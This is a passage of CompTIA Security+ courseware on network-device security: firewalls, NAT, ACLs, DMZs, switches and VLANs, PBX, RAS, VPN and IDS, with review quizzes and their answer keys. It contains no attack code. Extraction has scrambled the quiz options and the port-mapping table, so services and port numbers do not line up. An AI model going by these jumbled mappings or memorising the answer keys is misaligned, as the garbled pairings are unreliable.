Brick walls
B Cell phones
C D
Cordless phones Distance
Wireless and instant messaging 4 The 802.11a standard can use which of the following bands? A 2.4GHz
B
843
5GHz
C 2.4MHz D 5MHz 5 The 802.11b standard can use which of the following bands?
A
2.4GHz
B 5GHz C 2.4MHz D 5MHz 6 The 802.11a standard can transmit data at speeds of up to _____Mbps. A 11 B 36 C 48
D
54
7 Which of the following protocols is used to encrypt wireless transmission? A WAP

B
WEP
C WSP D WDP 8 The IEEE working group F has been tasked with creating a standard to allow for better roaming between access points and distribution systems. True or false?
True
9 Which of the following is part of the WAP 1.x stack? (Choose all that apply.)
A B
WAE WTP
C WSSL
D
WDP
E WIP
844
CompTIA Security+ Certification 10 WAP 2.0 has added a number of features that include which of the following? (Choose all that apply.) A WAP Push B User agent profile C Wireless Telephony Application D External Functionality Interface (EFI) E Multimedia Messaging Service (MMS)
F
All of the above
11 Instant messaging networks operate in either ______________ or ___________ configurations. (Choose all that apply.)
A
peer-to-network
B network-to-network C client/server
D
peer-to-peer
12 AOL Instant Messenger uses which TCP port?

A
5190
B 5050 C 80 D 1023
91
Unit 9 Network devices

A Describe the purpose of a network firewall
and how firewalls are implemented.

B Explain how routers can be configured to
provide additional security to a network.

C Identify the vulnerabilities of switches. D Describe the proper measures for securing
telecom, cable modem, and wireless communications devices.

E Provide a secure remote connection
through RAS and VPN technologies.

F Identify the different types of intrusion
detection systems.
G Perform network monitoring.
92
Topic A: Understanding firewalls

# 3.1 Objective Understand security concerns and concepts of the following types of devices Firewalls
Firewall concepts
Explanation There are really only two principal ways to secure a computer or network of computers from external breach: either physically isolate the computer or network from the outside world by disconnecting the network and telecom cables that provide contact with any other computers or networks; or virtually isolate the computer or network by implementing a firewall to stand guard between the outside world and the computer or network. A firewall is a barrier that isolates one network from another. Its main function is to protect an internal, private network from unauthorized access by an external, public network. The firewall can be a dedicated physical device or a software feature added to a router, switch, or other similar device. There are many ways to build a network firewall, but the following five steps will ensure that you have not missed anything: 1 Draft a written security policy. A well-written security policy ensures that the necessary blend of security and services is provided to the organization. 2 Design the firewall to implement the security policy. 3 Implement the firewall design by installing the selected hardware and software. 4 Test the firewall. Its fine to say you have a firewall, but if it doesnt work as intended, it might give you a false sense of security, increasing potential risk. 5 Review new threats, requirements for additional security, and updates to adopted systems and software. If additions or modifications are necessary, repeat the process from step one, in light of these changes. This is the management cycle for firewall protection, but the requirements of each, especially the first item, are often minimized or skipped, because most corporate managers find network security to be an arcane subject.
Drafting a security policy

Before implementing any security system, you should ask the following questions: What am I protecting? Whom am I protecting it from? What services does my company need to access over the network? Who gets access to which resources? Finally, who administers the network? By carefully considering these questions, you can draft a robust security policy. Available targets and who is aiming at them In answering the first and second questions, you need to determine what resources within your company need to be protected. Common areas of attack are Web servers, mail servers, FTP services, and databases. Its recommended that you complete a full audit of the resources in your organization so you have a better understanding of what targets are available.
Network devices
93
Scan for services that were not explicitly authorized by the company. Some employees might setup ad hoc FTP servers or Web servers, so it is critical to scan for open ports at all addresses. In addition, consider who might want to circumvent your security measures, and identify their motives. The types of hackers range from sport hackers, who are satisfied with merely penetrating your defenses, to hackers whose intent is causing damage or theft. Which services should be made available? In answering the third question, you should catalogue which services need to be available to your companys employees. Available services might provide access to intruders, so its imperative you lock out those services that are not needed. The following table is a table of common port mappings:
Service Dial Pad DNS FTP ICQ IPSEC IRC (Estimation) HTTP HTTPS NetMeeting NNTP Novell VPN software (BorderManager) pcAnywhere 2.0, 7.0, 7.50, 7.51 POP3 PPTP SMTP SSH SNMP Telnet TFTP AOL Instant Messenger 5190, 4443 TCP port # 51210 53 20, 21 4000 500 6661-6667 80 443 389, 522, 1503, 1720, 1731 119 353, 2010, 213 65301 110 1723 25 22, 1019-1023 161 23 69 22, 1019-1023 22 443 1080-6660 UDP port # 51200, 51201 53
By blocking those ports that correspond to services you do not need, your system will be more secure.
94
CompTIA Security+ Certification Who gets access to which resources? In addition to determining which services are required, you must determine who should have access to which resources within your network. You should list the employees or groups of employees along with the files, file servers, databases, and database servers to which they need access. In addition, you should list which employees need remote access to the network. Who administers the network? This question is easily answered, as it will be you who will be administering the network. On larger networks, however, there might be more than one person responsible for administering the network. These people, and the scope of individual management control, need to be determined up front.
Do it!
A-1:
Drafting a security policy

1 What is a firewall?
A firewall is a barrier that isolates one network from another. Its main function is to protect an internal, private network from unauthorized access by an external, public network.
2 What are the recommended steps to build a network firewall? (Choose all that apply.) A B C D E
F
Draft a written security policy. Design the firewall to implement the security policy. Implement the firewall design by installing the selected hardware and/or software. Test the firewall. Review new threats. All of the above.
3 One of the steps to drafting a security policy is to catalogue which services need to be available to your companys employees and lock out all services that are not needed. True or false?
True
Network devices
95
Designing the firewall to implement the policy

Explanation Once you have your written security policy, you can begin the process of selecting the appropriate technology to deploy as your firewall. Reading through the remainder of this unit will familiarize you with available technologies and give you an understanding of what should be used under which circumstances.
What do firewalls protect against?

Firewalls effectively protect against malicious packets from the outside and unauthorized Internet access from within the company. There are several common network attacks that can be successfully blocked by a properly configured and functioning firewall: denial of service (DoS), ping of death, Teardrop or Raindrop attacks, SYN flood, LAND attack, brute force or smurf attacks, IP spoofing, and others. Firewalls offer no protection against malicious attacks from internal users.
How do firewalls work?

At their core, all firewalls protect networks using some combination of the following techniques: Network address translation (NAT) Basic packet filtering Stateful packet inspection (SPI) Access control lists (ACL) Basic firewalls use only one technique, usually NAT, but firewalls that are more comprehensive use all of the techniques combined. As added features usually increase complexity and cost however, its a good idea to closely examine your needs as written down in your security policy and implement only those solutions that are appropriate. Network address translation One of the most common security features offered by most firewalls is network address translation (NAT). NAT gives you the ability to mask the IP addresses of those computers behind the firewall from the external world. Even though private addresses are used internally, all internal routers have a default route that directs public addresses to a specific NAT router. Each time a connection is made from an internal private address, the NAT router selects an available public address from a pool of available IPs and inserts it into the packet prior to forwarding it on to the external network. A table that maps internal to external addresses is maintained to ensure proper mapping for the duration of the connection. Neither the host nor the client involved in the connection is aware of the intervening NAT, so no special accommodations need to be made in client or server applications. The problem with basic NAT is that each active connection requires a unique external address for the duration of the communication. With the increased use of the Web, a much higher percentage of internal systems are likely to be connected to the public network at a given time. Under basic NAT, this requires a much larger pool of public addresses. A derivative of NAT, port addresses translation (PAT) tackles this issue by supporting thousands of simultaneous connections on a single public IP address.
96
CompTIA Security+ Certification Port address translation PAT guarantees a unique connection by using a combination of an IP address and a TCP or UDP port, called a socket, rather than the address alone. When an internal system connects to an external resource, it typically selects a short-lived source port to create a unique socket. When the request routes through the NAT, the IP address is changed to a public address and a short-lived port is selected that guarantees uniqueness. A table of the source address, source port, NAT source IP, NAT source port, destination IP, and destination port is maintained by the router. The combination of NAT source IP and NAT source port and destination IP and port are guaranteed to be unique. PAT is really a subset of NAT and is now available in very inexpensive routers available for home use. This provides a useful method for conserving IP addresses, as well as concealing internal system identities. A drawback of this method is with the servereach external IP address can only support a single process on any given port, although the NAT router can direct these connections to different internal systems. NAT with port address translation is shown in the following table:
Inside Source Address: Port 10.1.1.2:1100 10.1.1.3:1200 Outside Source Address: Port 192.50.20.1:1024 192.50.20.1:1025 Outside Destination Address 192.50.20.2 192.50.20.3
Basic packet filtering After NAT, the most basic security function performed by a firewall is packet filtering. Packet filters decide whether to forward individual TCP/IP packets based on information contained in the packet header and on filtering rules set by the network administrator. Most packet filters can be configured to screen information based on the following data fields: protocol type, IP address, TCP/UDP port, and source routing information. Improper filtering can end up blocking valid packets or permitting rogue packets. For a more thorough discussion of network packet handling, see the section on routers later in this unit. Stateful firewalls Stateful firewalls represent a major advancement in firewall technology. They keep a record of every network connection in which they participate. They can record sessionspecific information, including which ports are in use on the client and server. This is important because, although most Internet services run on well-known ports, Internet clients might be using any port above 1023. A basic (stateless) packet filter must let Web servers respond to browsers at one of these high port numbers, but it cant tell which one, so it leaves them all open. Stateful packet inspection enhances security by allowing the filter to distinguish on which side of the firewall a connection was initiated. This latter feature is essential to blocking IP spoofing attacks. A stateful packet filter monitors the three-way handshake that initiates a TCP connection. Only TCP packets that are identified as being a part of the handshake, or can be identified with an established connection, are allowed through the firewall.
Network devices
97
Some filters even respond to connection requests on behalf of the internal server until the three-way handshake is properly completed by mimicking the connection to the internal server, and then they begin passing packets once the connection is made. Once a session is properly ended or times out, no additional packets are allowed on that connection without a new three-way handshake. This is an effective countermeasure against SYN floods. Access control lists Traffic filtering is available through access control lists (ACL). A Cisco router provides different levels of filtering; using either the standard or the extended list (the latter allows filtering by different criteria). The basic syntax is as follows:
access-list list_number network_mask access-list 101 permit/deny source_IP_address
For example, to stop any inbound packet with an internal (spoofed) source IP address:
deny 10.13.31.0 0.0.0.255
At the same time, to let all outbound internal packets through with a legitimate source IP address include:
access-list 102 permit 10.13.31.0 0.0.0.255
Access lists are executed from first statement to last until a match on the inspected packet is found, then all processing of the list stops, and the rule of the first match is applied. There is an implied deny everything else at the end of every list so if no matches occur, the packet is denied by default.
98
Do it!
A-2:
Designing the firewall to implement policy

1 Network address translation (NAT) involves the translating of the MAC address of a network interface card before a packet is sent out onto the Internet. True or false?
False. NAT masks the IP addresses of computers behind the firewall from the external world.
2 The problem with basic NAT is that each active connection requires a unique external address for the duration of the communication. True or false?
True
3 Stateless packet filters can record session-specific information about the network connection. True or false?
False: Stateful packet filters do this.
4 Which of the following data items is found in the port address translation table? (Choose all that apply.) A B C D
E
Source address NAT source port NAT source IP address Destination port All of the above
5 Most packet filters can be configured to screen information based on the protocol type, IP address, TCP/UPD port, and source routing information fields. True or false?
True
6 Access control lists work by blocking all inbound packets. True or false?
False: They can either allow or block inbound or outbound packets for specific IP addresses.
Network devices
99
Topic B: Routers
# 3.1 Objective Understand security concerns and concepts of the following types of devices Routers
Introducing routers
Explanation A router is a network management device that sits between different network segments and routes traffic from one network to another. This role of digital go-between is essential because it allows different networks to communicate with one another and allows the Internet to function. With the addition of packet filtering however, routers can take on an additional role of digital traffic cop.
How a router moves information

When you use your computer to access the Internet, you are employing the services of multiple routers. You type an address into your Web browser, the request is sent out into cyberspace, and the requested Web page loads on your browser. The steps involved are as follows: 1 Internet data, whether in the form of a Web page, a downloaded file, or an email message, travels over a packet-switching network. The information is broken up into pieces and inserted as data into packets. 2 To complete the packet, additional information is included: the senders address, the receivers address, and a checksum value that allows the receiving computer to be sure that the packet arrived intact. 3 Each packet is then sent to its destination using the best available route, which might differ for each packet. If the path the packet takes is not preset, then how is it chosen? That is where the router comes in. The routers that make up the main part of the Internet can reconfigure the paths that packets take because they are constantly in communication with one another and are aware of each of the networks to which they are connected. By examining the contents of the packet and comparing the destination address to the list of addresses contained in the routers lookup tables, they can determine which router to send the packet along to next, based on changing network conditions.
Beyond the firewall

Beyond the firewall, but before the Internet, lies a no-mans land called the demilitarized zone (DMZ) and, potentially, one or more bastion hosts.
910
CompTIA Security+ Certification Demilitarized zone (DMZ) The demilitarized zone (DMZ) is the area that a company sets aside for servers that are publicly accessible or have lower security requirements than other internal servers. The DMZ gets its name from the traditional setup of a network segment between two routers. This environment neither is subject to the unsecure environment of the Internet, nor is it fully protected by the internal routerhence it is demilitarized. The DMZ is commonly home to public Web, FTP, and DNS servers that need to be accessed by the public. This is also a typical location to place remote dial-up access, providing defense in depth with the interior router. If a hacker gains access to the RADIUS server, he or she still must authenticate through the internal firewall. This can be seen in Exhibit 9-1.
Exhibit 9-1: An example of a demilitarized zone (DMZ) Bastion hosts A bastion host is defined as a computer that resides in a DMZ and hosts Web, mail, DNS, and/or FTP services. An effective bastion host is configured quite differently from a typical host. Some organizations have a bastion host that offers several services at once; other organizations prefer to have several bastion hosts with each fulfilling a specific role. In either event, all unnecessary programs, services, and protocols are removed and all unnecessary network ports are disabled. In addition, bastion hosts do not share authentication services with trusted hosts within the network. This is so that, if a bastion host is compromised, the hacker cannot gain any information beyond what resides on the bastion host. ACLs are modified on the file system and other system objects. All appropriate service packs, hot fixes, and patches should be installed on bastion hosts. Logging of all security-related events should also be enabled, and those logs should be reviewed on a regular basis to increase the chance of observing any inappropriate behavior.
Network devices
911
Honey pots or decoy computers specifically set up to attract and track potential hackers are not considered true bastion hosts, because they are not designed to offer legitimate services to the Internet, but rather are deliberately exposed to delay and sidetrack potential hackers and to facilitate tracking of any attempted break-ins. Application gateways Application gateways, also known as proxy servers, monitor specific applications such as FTP, HTTP, and Telnet, plus they allow packets accessing those services to go to only those computers that are allowed. Application gateways are a good backup to packet filters because a firewall that is set up to allow a specific service such as FTP can send the allowed packets to only one computer, the application gateway. As an example of how an application gateway works, consider a site that blocks all incoming FTP connections except those to a specific computer. The router allows FTP packets to go to only one computer, the FTP application gateway. A user who wishes to connect inbound to an FTP server would have to connect first to the application gateway, and then to the destination computer, as follows: 1 A user first connects to the application gateway and enters the name of an internal computer. 2 The gateway checks the users source IP address and accepts or rejects it according to the access control list. 3 The user might need to authenticate himself or herself with a username and password. 4 The proxy service creates an FTP connection between the gateway and the internal computer. 5 The gateway proxy service then passes bytes between the two connections. 6 The application gateway logs the connection. The security advantages inherent in application gateways also include: Information hiding The application gateway might be the only computer with a name known to the outside world, the actual servers hosting services such as FTP need never be disclosed. Robust authentication and logging All traffic can be made to pass through the application gateway, traffic can be authenticated before it reaches internal computers and can be logged. Simpler filtering rules The application gateway is the only computer that needs to be contacted by the filtering firewall or router, those systems need only allow application traffic destined for the gateway and discard the rest. The chief disadvantage of application gateways is that a single computer host assigned as the gateway must handle all incoming connections that, in a busy environment, could overwhelm the gateway. In addition, in the case of client-server protocols such as HTTP, two steps are required to connect inbound or outbound traffic, and this can increase processor overhead if there are many connections.
912
The OSI stack

To better describe the various functions in most networks and to further the development of compatible products by vendors, the Open Systems Interconnection (OSI) reference model was developed by the International Organization for Standardization. The seven layer model can be seen in Exhibit 9-2.
Exhibit 9-2: The OSI seven layer model The Physical layer (layer 1) deals with the electrical signals, the media access method (Ethernet, Token-Ring, etc.), and the actual hardware of networking, including cables, connectors, hubs and network cards. The Data Link layer (layer 2) deals with the MAC address. This is the layer where bridges and older switches function. The IP protocol works at the Network layer (layer 3), providing addressing and routing functions. The Transport layer (layer 4) is responsible for host-to-host communications. Its two protocols are TCP and UDP. The Session layer (layer 5) establishes, manages, and terminates connections. The Presentation layer (layer 6) translates the applications data format to the networks communication format. The Application layer (layer 7) defines how programs like FTP, HTTP, and Telnet exchange data.
Network devices
913
A function at each layer need only be able to communicate with the layers above and below it and be able to communicate with its peer level. Changes at one level should not affect the ability of the other layers to function. For instance, if a Token Ring network is migrated to an Ethernet system, only the cabling, hardware, and drivers that represent the Physical and Data-Link layers need be modified, but the IP network should still function, as well as all protocols and applications above it.
Limitations of packet-filtering routers

Defining packet filters can be a cumbersome task because network administrators must have a detailed understanding of the various Internet services, packet header formats, and the specific values they expect to find in each field. If complex filtering requirements must be supported, the ACL can become long, complicated, and increasingly difficult to manage and comprehend. In addition, as the list of filtering rules grows the processor overhead and, subsequently, the time it takes to handle a packet also grows. Generally, as the number of rules being processed by a router increases, the throughput of the router decreases. Most routers are optimized to extract the destination IP address from each packet, look up the forwarding information for the packet, and then send the packet on its way. With packet filtering enabled, the router must now apply each of the rules in the ACL and make a decision about forwarding the packet. This process increases the amount of time it takes to send a packet along and decreases the throughput speed of the router. Another problem with filtering packets at layers 3 through 5 is that the router is not able to determine the specific context or data of the packets it is examining. This means that the router can reject all e-mail packets but cannot reject just those e-mail packets that contain potentially harmful material such as viruses. In order to block a specific type of e-mail message, FTP request, or Telnet command, an application gateway or proxy server needs to be employed. Routers that employ stateful packet filters act as quasi application gateways, examining a packets content in addition to the IP address.
914
Do it!
B-1: Discussing routers and gateways Questions and answers

1 When a packet goes through a router with ________________ packet inspection, the router inspects both the IP header and the content of the packet.
stateful
2 A computer that resides in a DMZ and hosts Web, mail, DNS, and/or FTP services is called a ________ ________.
bastion host
3 IP packets are routed by layer 2 of the OSI model. True or false?

False: They are routed by layer 3.
4 Application gateways are also known as proxy servers. True or false?

True
5 Some of the features of a DMZ are: A B C D

E
It is a network segment between two routers. Its servers are publicly accessible. Its servers have lower security requirements than other internal servers. It commonly contains bastion, public Web, FTP, DNS, and RADIUS servers. All of the above.
6 Application gateways simplify filtering rules on routers; the router need only allow application traffic destined for the gateway, and can discard the rest. True or false?
True
7 Which of the following tasks can be performed by the proxy server? (Choose all that apply.)
A B
Checks its access control list to accept or reject the client request Authenticates the user Opens a connection between the user and the internal computer Logs the connection All of the above
C
E
Network devices 8 Describe two limitations of packet-filtering routers in managing security.

915
Packet filters can be cumbersome to define Processor overhead grows and throughput decreases with complexity of the ACL Stateless routers cannot examine the content of a packet
916
Topic C: Switches
# 3.1 Objective Understand security concerns and concepts of the following types of devices Switches
Repeaters, hubs and switches

Explanation Many network devices, including repeaters, hubs, bridges, and switches, have both physical and logical configurations. Repeaters and hubs function at the Physical layer and extend the Ethernet segment by recreating the transmission signals. Hubs are simply multiport repeaters with all ports existing on the same collision domain. Bridges function at layer 2 and filter and forward packets based on their MAC address. They separate the network into two or more collision domains. Their function is based on a table of MAC addresses and host location built from the moment they are turned on. Switches also function at layer 2, but divide the network into multiple domains, the number depending on the number of ports on the switch. Although bridges and switches divide collision domains, they forward broadcasts to all hosts on the layer 2 network. An example of a switch is shown in Exhibit 9-3.
Exhibit 9-3: 3 Com SuperStack switch Just as they made moving information within an intranet more efficient, a new breed of switches is now operating at layer 3, the Network layer. Its now possible to combine the speed of hardware switching with the optimized path choosing of layer 3.
Switch security
Modern switches offer a variety of security features including ACLs and Virtual Local Area Networks (VLANs). The ACL-based packet filtering is similar to that mentioned previously, so this discussion concentrates on VLANs. From a security perspective, the major benefit of a switch over a hub is the separation of collision domains, limiting the possibility of easy sniffing.
Network devices Virtual local area networks The following is the Cisco definition of a virtual local area network (VLAN):
917
A VLAN is defined as a broadcast domain within a switched network. Broadcast domains describe the extent that a network propagates a broadcast frame generated by a station. Some switches might be configured to support a single or multiple VLANs. Whenever a switch supports multiple VLANs, broadcasts within one VLAN never appear in another VLAN. Switch ports configured as a member of one VLAN belong to a different broadcast domain, as compared to switch ports configured as members of a different VLAN. (Overview of Routing Between Virtual LANs, Cisco Systems.) VLANs increase security by clustering users in smaller groups, thereby making the job of the hacker harder. Rather than just gaining access to the network, a hacker must now gain access to a specific virtual LAN as well. In addition, by clustering users in a VLAN, the possibility of a broadcast storm is reduced. Security problems with switches Switches, even with VLANs enabled, are still susceptible to being compromised. Hackers can hijack a switch and reconfigure it to allow any traffic they wish through the system. Switch hijacking occurs when an unauthorized person is able to obtain administrator privileges of a switch and modify its configuration. Once a switch has been compromised, the hacker can do a variety of things, such as changing the administrator password on the switch, turning off ports to critical systems, reconfiguring VLANs to allow one or more systems to talk to systems they shouldnt, or they might configure the switch to bypass the firewall altogether. There are two common ways to obtain unauthorized access to a switch: trying default passwords, which might not have been changed, and sniffing the network to get the administrator password via SNMP or Telnet. Almost all switches built today come with multiple accounts with default passwords, and in some cases, no password at all. While most administrators know enough to change the administrator password for the telnet and serial console accounts, sometimes people dont know to change the SNMP strings that provide remote access to the switch. If the default SNMP strings are not changed or disabled, hackers might be able to obtain a great deal of information about the network or even gain total control of the switch. The Internet is full of sites that list the various switch types, their administrator accounts, SMTP connection strings, and passwords. If the default password(s) do not work, the switch can still be compromised if a hacker is sniffing the network while an administrator is logging on to the switch. Contrary to popular belief, its very possible to sniff the network when on some switches. This means that even if you change the administrator password(s) and the SNMP strings, you might still be vulnerable to switch hijacking. The easiest way to sniff a switched network is to use a software tool called dsniff, which tricks the switch into sending packets destined to other systems to the sniffer. Dsniff not only captures packets on switched networks, but also has the functionality to automatically decode passwords from insecure protocols such as Telnet, HTTP, and SNMP, which are commonly used to manage switches.
918
Securing a switch
Gaining access to a switch is the first step in gaining control of it, all management interfaces on switches should be isolated to reduce the chance of a successful attack. Many switches use Telnet or HTTPboth being open text protocolsfor management. It is recommended that any management of the switch be done by physical connection to a serial port or through secure shell (SSH) or another encrypted method if available. Separate switches or hubs should be used for DMZs to physically isolate them from the rest of your network and prevent VLAN jumping. Its important to put a switch behind a dedicated firewall device. Ensure that you maintain the switch, installing the latest version of the switch software and any security patches to protect yourself against exploits such as the land.c attack. Read the product documentation, paying special attention to administration accounts and default passwords. Always set strong passwords on the switch. Do it!
C-1:
Understanding switches

1 What is the function of a switch?
It separates a common segment into two or more collision domains and forwards packets to the correct domain based on the MAC address.
2 Modern switches can reduce broadcast traffic by forwarding packets based on the IP address. True or false?
True
3 A feature available in some switches that permit separating the switch into multiple broadcast domains is called ___________.
VLAN
4 What is switch hijacking?

This is an attack where an unauthorized person obtains administrator privileges of a switch and modifies its configuration to allow any traffic through the network. The hacker can change the switchs administrator password, turn off ports to critical systems, reconfigure VLANs, or configure the switch to bypass the firewall.
Network devices
919
Topic D: Telecom, cable modem, and wireless devices

# 3.1 Objective Understand security concerns and concepts of the following types of devices Wireless Modems Telecom / PBX (Private Branch Exchange) Mobile Devices
PBX, DSL, cable modems and mobile devices

Explanation Communications devices such as PBX, DSL, cable modems, and mobile devices require as much diligence when implementing security as the internal network. Your security policy should account for these often overlooked devices.
Private branch exchange

Private branch exchange (PBX) security is at heart very similar to traditional network security and is becoming increasingly more, so with the advent of IP-based telephony. An IP-based PBX is pictured in Exhibit 9-4.
Exhibit 9-4: An IP-based PBX network A traditional PBX is a computer-based telephone switch that might be thought of as a small, in-house, telephone company. Failure to secure a PBX can result in toll fraud, theft of information, denial of service, and enhanced susceptibility to legal liability because of disclosure of supposedly secure information. As with traditional networks, the process of securing a PBX should be part of a written security policy. Determining who will be administering your PBX, who will be allowed what services, and what access to the PBX will be allowed, are all essential pieces of information.
920
CompTIA Security+ Certification Many PBX systems are remotely managed by the vendor who developed the system. If a PBX is remotely managed, that means intrusion into the system can happen without anyone actually gaining physical access to the PBX hardware. It is recommended that, unless you are mandated to provide remote administration by the vendor, you remove this feature and administer the PBX from a console directly connected to the system. Additionally, many PBX systems are setup by default to allow handsets to be attached and detached at will by simply plugging a phone into the network and pressing a code on the keypad. This is done to ease maintenance, especially in those offices where hoteling or job sharing is common. Although this does ease the ability to move phones, it also opens a large security hole in the PBX system, because many of the move codes are standardized and posted on the Internet.
Modems
The increasing availability of digital cable and digital subscriber line (DSL) brought some new security issues with them. Although this section is too limited to cover them in depth, the discussion touches upon several of the more pressing issues. A typical cable modem can be seen in Exhibit 9-5.
Exhibit 9-5: EtherFast cable modem with USB and Ethernet Connection Model BEFCM U10 DSL versus cable modem security In the past, DSL had a security edge over cable systems. This came about because of the different methods by which the technologies connected their clients to the Internet. DSL lines provide a direct connection between the computer or network connected on the client side and the Internet. This direct connection is in contrast to the party line nature of cable systems. Cable modems are connected to a shared segment that, not unlike a corporate LAN, means that anyone else on that segment can potentially threaten your system unless proper precautions are taken. Although some cable customers encountered problems with the shared nature of the network in the past, most cable service providers now mitigate this problem by building security features into the cable modem hardware used to connect to their networks. In particular, basic network firewall capabilities now prevent customer files from being viewed or downloaded.
Network devices
921
Most cable modems today also implement the Data Over Cable Service Interface Specification (DOCSIS). DOCSIS includes support for cable network security features including authentication and packet filtering. Dynamic versus static IP addressing Another major security concern that used to plague both DSL and cable modem users was the issuing of static (permanent) IP addresses by the service providers. Now, most service providers use Dynamic Host Configuration Protocol (DHCP) to issue dynamic, random IP addresses to their clients. These are leased for a short period. Static addresses provide a fixed target for potential hackers, so the move to DHCP is definitely an improvement. Additional security can be provided by a firewall solution.
Wireless
Wireless devices, while providing greater flexibility, mobility, and overall convenience, and have their own vulnerabilities when it comes to security. While network connections utilize the same TCP/IP protocol that wired LANs use, the wireless nature of the technology means that almost anyone can eavesdrop on a network communication; even if your wireless access point is protected by your firewall, you are still susceptible to having your unencrypted transmissions overheard. In addition, without proper access control, anyone can connect to the network. The only secure method of communicating with wireless technology is limiting access through MAC address filtering and providing confidentiality with encryption. Mobile devices Mobile devices, specifically Personal Digital Assistants (PDAs), can open security holes for any computer with which these devices communicate. A gap that is not covered by antivirus software or firewalls occurs during the PDA to PC synchronization process. View McAfees Web site to get more information about wireless security at
http://www.mcafee.com/myapps/vsw/default.asp. An example of a pocket
PC phone can be seen in Exhibit 9-6.
Exhibit 9-6: T-Mobile Pocket PC phone edition
922
Do it!
D-1:
Reviewing telecom, cable, and wireless security

1 What are two standard features found in todays cable modem hardware that protect customer files from being viewed or downloaded?
Basic network firewall and Data Over Cable Service Interface Specification (DOCSIS)
2 Failure to secure a PBX can result in toll fraud, theft of information, denial of service, and enhanced susceptibility to legal liability because of disclosure of supposedly secure information. True or false?
True
3 Explain the vulnerability involved in allowing the vendor to remotely manage the PBX system.
If a PBX is remotely managed, an intrusion into the system can happen without anyone actually gaining physical access to the PBX hardware.
4 Explain why allowing handsets to be attached and detached at will within a PBX system is considered risky.
Many of the move codes are standardized and posted on the Internet.
5 Why is DHCP considered more secure than static IP addressing?

Static IP addresses provide a fixed target for potential hackers; DHCP leases the IP address for a short time.
6 DHCP provides enhanced security for a computer by: A

B
Changing the MAC address of the computer on a random basis Changing the IP address of the computer on a random basis Tracking all keystrokes entered on the computer
7 What is the best method for ensuring confidentiality in wireless communications? A

B
Firewall Encryption Authentication Access control lists
C D
8 How is it possible to spread a virus from a PDA?

The virus can be downloaded to a PC during sync operations.
Network devices
923
Topic E: Securing remote access

# 3.1 Objective Understand security concerns and concepts of the following types of devices RAS (Remote Access Server) VPN
Remote access services

Explanation Permitting employees to remotely access the corporate network requires careful consideration and planning. Two commonly used measures for ensuring authentication and confidentiality are RAS and VPN. The Remote Access Service (RAS) provides the ability for one computer to dial into another computer via a standard modem. Once connected and authenticated, the remote user has the same access as if connected using a wired network connection. RAS servers typically have an array of modems and dial-in lines for remote connections. In addition to accepting incoming calls, most RAS servers also offer a feature called callback, which allows the server to disconnect an incoming RAS call and dial the callers number to reconnect. If the caller is not at the designated number, then no RAS connection is made. Callback is the most secure method for using RAS, though it will only work for fixed phone numbers such as telecommuting workers working from home. After users connect to the network through RAS, they have the same rights and privileges they have when they log on to a workstation that is physically wired to the network. RAS treats a modem as an extension of the network; RAS can use the same variety of protocols as a standard network interface card (NIC). RAS should be placed in the DMZ. It needs some protection, but generally should be considered insecure, and remote users should be forced to authenticate through an internal firewall prior to gaining full network access. One way to implement this is with a lock and key access method through the router. This is even available on low-end routers (such as Cisco 2600s). Security problems with RAS The RAS server is typically situated between the Internet and any physical firewall you might have in place, you should use a bastion host running only RAS and protected by application gateway software or firewall software. To further enhance security, use the encryption and mandatory callback features offered on RAS. In addition, if any unauthorized persons should gain access to the RAS server, they will still have to break through the firewall to get useful information.
924
Virtual private networks

A Virtual Private Network (VPN) is used to provide a secure communication pathway or tunnel through such public networks as the Internet. An example of a typical VPN can be seen in Exhibit 9-7.
Exhibit 9-7: A typical VPN using Point of Presence (POP) When a virtual private network is implemented, the lowest levels of the TCP/IP protocol are implemented using an existing TCP/IP connection. The VPN hardware or software encrypts either the underlying data in a packet or the entire packet itself before wrapping it in another IP packet for delivery. Even if the packet is intercepted along the way, the content cannot be revealed to the hacker. Security is further enhanced by implementing Internet Protocol Security (IPSec). IPSec encryption IPSec was initially developed for Internet Protocol version 6 (IPv6), but many current IPv4 devices support it as well. It is the most commonly used encryption scheme for VPN tunnels. IPSec allows the encryption of either just the data in a packet or the packet as a whole including the address header information. These are called transport and tunnel, respectively. With IPSec in place, a VPN can virtually eliminate packet sniffing and identity spoofing. This is because only the sending and receiving computers hold the keys to encrypt and decrypt the packets being sent across the public network. The following steps show the process: 1 A remote user opens a VPN connection between his computer and his office network. The office network and the users computer (or their respective VPN gateways) execute a handshake and establish a secure connection by exchanging private keys. 2 The user then makes a request for a particular file.
Network devices
925
3 Assuming that the user has sufficient rights, the network begins to send the file to the user by first breaking the file into packets. If the VPN is using transport encryption, then the packets data is encrypted and the packets are sent on their way. If the system is using tunneling encryption, then each packet is encrypted and placed inside another IP envelope with a new address arranged for by the VPN gateways. 4 The packets are sent along the Internet until they are received at the users VPN device, where the encryption is removed and the file is rebuilt. If the VPN is using tunneling encryption, the peer VPN gateway forwards the unencrypted packets to the appropriate host on its LAN. Anyone sniffing the packets would have no idea of their content and might not even be able to determine the source and destination of the request. Do it!
E-1:
Securing remote access devices

1 Describe the callback feature offered by RAS.
Callback allows the server to disconnect an incoming RAS call and dial the callers number to reconnect. If the caller is not at the designated number, then no RAS connection is made.
2 RAS treats a modem as an extension of the network. True or false?

True
3 If the RAS is placed in the DMZ, remote users should be forced to authenticate through an internal firewall prior to gaining full network access. True or false?
True
4 Which encryption method is commonly used for VPN tunneling? (Choose all that apply.)
A B
Transport IPSec CHAP EAP
C D
926
Topic F: Intrusion detection systems

# 3.1 Objective Understand security concerns and concepts of the following types of devices IDS (Intrusion Detection System) Network Monitoring / Diagnostics
Host-based IDS
Explanation Intrusion detection systems (IDS) offer the ability to analyze data in real time to detect, log, and stop misuse or attacks as they occur. IDS solutions are available from a variety of vendors including Computer Associates, Inc., Cisco Systems Inc., NFR Security, SecureWorks, and many others. Systems come in the form of software called computerbased IDS and dedicated hardware devices called network-based IDS. Host-based IDS are often used to secure critical network servers or other systems containing sensitive information. In a typical implementation, software applications known as agents are loaded on each protected computer. These agents make use of the disk space, RAM, and CPU time to analyze the operating system, applications, and system audit trails. The collected information is compared to a set of rules to determine if a security breach has occurred. These agents are tailored to detect computer-related activity and can track these types of events at an extremely fine level, even down to tracking which user accessed which file at what time. Host-based agents can be self-contained, sending alarm information to the screen attached to the computer upon which they are installed or they might be remotely managed by a central software package that receives periodic updates and security data. A computer-based solution that includes a centralized management platform makes it easier to upgrade the software; however, these types of solutions do not scale well across a large enterprise given the number of computers involved.
Network-based IDS
